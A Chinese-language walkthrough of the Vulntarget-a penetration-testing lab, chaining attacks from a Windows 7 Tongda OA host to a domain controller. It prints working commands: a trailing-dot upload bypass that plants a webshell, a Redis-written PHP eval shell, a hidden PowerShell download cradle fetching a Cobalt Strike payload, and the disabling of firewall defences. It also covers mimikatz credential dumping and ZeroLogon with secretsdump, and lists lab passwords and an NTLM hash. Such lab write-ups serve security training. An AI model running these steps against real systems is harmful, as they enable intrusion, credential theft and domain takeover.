Vulntarget-a靶场
靶场地址:https://github.com/shengshengli/vulntarget
靶场拓展
kali攻击机IP:192.168.31.111 win7入口:192.168.31.6
首先进行端口扫描
PORT STATE SERVICE VERSION
80/tcp open http nginx
|_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-robots.txt: 1 disallowed entry
|_/
110/tcp open pop3
| fingerprint-strings:
| GenericLines, HTTPOptions:
| +OK TDpop3Server 1.0 POP3 Server ready.
| -ERR An error occured
| NULL:
|_ +OK TDpop3Server 1.0 POP3 Server ready.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped
|_ssl-date: 2022-06-29T08:51:28+00:00; -1m21s from scanner time.
| rdp-ntlm-info:
| Target_Name: WIN7-PC
| NetBIOS_Domain_Name: WIN7-PC
| NetBIOS_Computer_Name: WIN7-PC
| DNS_Domain_Name: win7-PC
| DNS_Computer_Name: win7-PC
| Product_Version: 6.1.7601
|_ System_Time: 2022-06-29T08:51:14+00:00
| ssl-cert: Subject: commonName=win7-PC
| Not valid before: 2022-06-27T13:42:35
|_Not valid after: 2022-12-27T13:42:35
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port110-TCP:V=7.92%I=7%D=6/29%Time=62BC129D%P=x86_64-pc-linux-gnu%r(NUL
SF:L,29,"\+OK\x20TDpop3Server\x201\.0\x20POP3\x20Server\x20ready\.\r\n")%r
SF:(GenericLines,40,"\+OK\x20TDpop3Server\x201\.0\x20POP3\x20Server\x20rea
SF:dy\.\r\n-ERR\x20An\x20error\x20occured\r\n")%r(HTTPOptions,40,"\+OK\x20
SF:TDpop3Server\x201\.0\x20POP3\x20Server\x20ready\.\r\n-ERR\x20An\x20erro
SF:r\x20occured\r\n");
MAC Address: 4C:D5:77:CB:F4:99 (Chongqing Fugui Electronics)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: win7-PC
| NetBIOS computer name: WIN7-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-06-29T16:51:13+08:00
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: WIN7-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:5f:e9:81 (VMware)
|_clock-skew: mean: -1h37m21s, deviation: 3h34m39s, median: -1m21s
| smb2-time:
| date: 2022-06-29T08:51:13
|_ start_date: 2022-06-29T08:50:03
此机器存在ms17010漏洞,可以通过msf来拿到system权限,这里不做演示
访问80端口,是一个通达OA
访问/inc/expired.php,可得到通达OA的版本:11.3
访问/resque/worker.php,可以得到主机名:win7-PC
可以通过默认的用户名密码登录到后台 admin:空
在后台可以通过上传一个马,来getshell
在菜单-->系统设置-->系统参数设置-->OA服务设置处发现Web目录为:C:\MYOA\webroot\
设置附件上传的目录
菜单-->系统设置-->附件管理-->存储目录管理-->添加存储目录,将目录设置为C:\MYOA\webroot\
添加成功
现在开始上传文件,组织-->系统管理员
使用burp进行抓包上传,上传后的文件名是通过返回包中的id字段后半段和文件名组成,例如:289128391.test.txt
上传的路径是get请求中module的值和返回包中id字段@后面的四位数,例如:/xx/1234
先随便上传一个txt文件,成功上传,并且返回包中有id值
得到文件路径为:/im/2206/1312269580.test.txt,访问发现上传成功
上传一个php文件,返回一串unicode编码
进行unicode解码发现不允许上传php文件
利用windows的特,在保存文件的时候会自动去除文件名后面的.,如果上传的文件名是test.php.这样就可以绕过,windows在保存文件的时候会保存成test.php
上传一个php冰蝎马,在文件后缀后面加一个.
上传成功,冰蝎连接http://192.168.31.6/im/2206/1459520029.shell.php
查看一下权限,发现是system权限
systeminfo查看一下主机的信息(win7专业版,64位,双网卡)
生成cs木马,通过冰蝎上传木马并运行,上线cs
使用mimikatz抓取明文密码logonpasswords,得到win7用户的密码是admin
查看防火墙状态,发现是开启的,然后关闭防火墙
netsh advfirewall show allprofile state 查看防火墙的当前状态
netsh advfirewall set allprofile state off 关闭防火墙
使用注册表开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f远程桌面连接即可
上传fscan来扫描第二张网卡C段的主机和可利用的漏洞(server2016是开了防火墙的,禁ping了,fscan需要加一个-np参数)
有一个10.0.20.99的主机,并且开放了80,135,445,6379端口 搭建隧道(frp+proxifier),访问10.0.20.99的80端口,只有一个hello world
进行目录扫描,发现有l.php和phpinfo.php
l.php是php探针,可以发现它的路径在C:/phpStudy/PHPTutorial/WWW/
获得路径可以直接通过redis未授权来写shell
config set dir C:/phpStudy/PHPTutorial/WWW/
config set dbfilename ccc1.php
set 1 "<?php eval($_REQUEST[1]);?>"
save
蚁剑连接,执行whoami,也是system权限,成功拿下server2016
使用蚁剑连接写入的木马
通过蚁剑上传冰蝎马,然后使用冰蝎连接
拿到第二台的shell,现在需要上线一下cs,在拿下的第一台win7机器中使用natbypass来进行端口流量的转发
将9500端口的流量转发到cs服务器上
nb -listen 9500 9090
nb -slave 127.0.0.1:9090 cs_server:8181
首先拿第一台主机做一个监听器
使用钓鱼攻击,attacks-->web drive-by-->scripted web delivery,类型选用powershell
会得到powershell命令
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://cs_server:8181/a'))"将里面的ip和端口换成win7的9500端口
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.0.20.98:9500/a'))"将powershell命令,使用redis写入到windows启动项中
C:/Users/win2016/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/shutdown -r -t 0将靶机重启,server2016成功上线cs
上线的2016权限是win2016,是一个低权限,准备生成一个exe木马丢到web目录下并执行
成功上线2016并且权限是system
用mimikatz抓明文密码没有抓到,获得hash并解码得到administrator的密码是Admin@123
查看网络信息,2016也是双网卡,还有一个10.0.10.111,并且2016是在域环境中
域控ip为:10.0.10.110
查看域内用户组列表net group /domain
查看域内的机器net group "domain computers" /domain,只有一个win2016的机器
查看域控机器net group "domain controllers" /domain,发现域控的主机名是win2019
得到域控的主机名和ip检测一下是否存在zerologon(CVE-2020-1472)漏洞
检测发现存在漏洞,使用exp将密码置空
使用impacket的secretsdump.py脚本将域控的hash值dump下来
得到域控administrator的hash
aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15使用psexec.py登录,获得域控2019的system权限
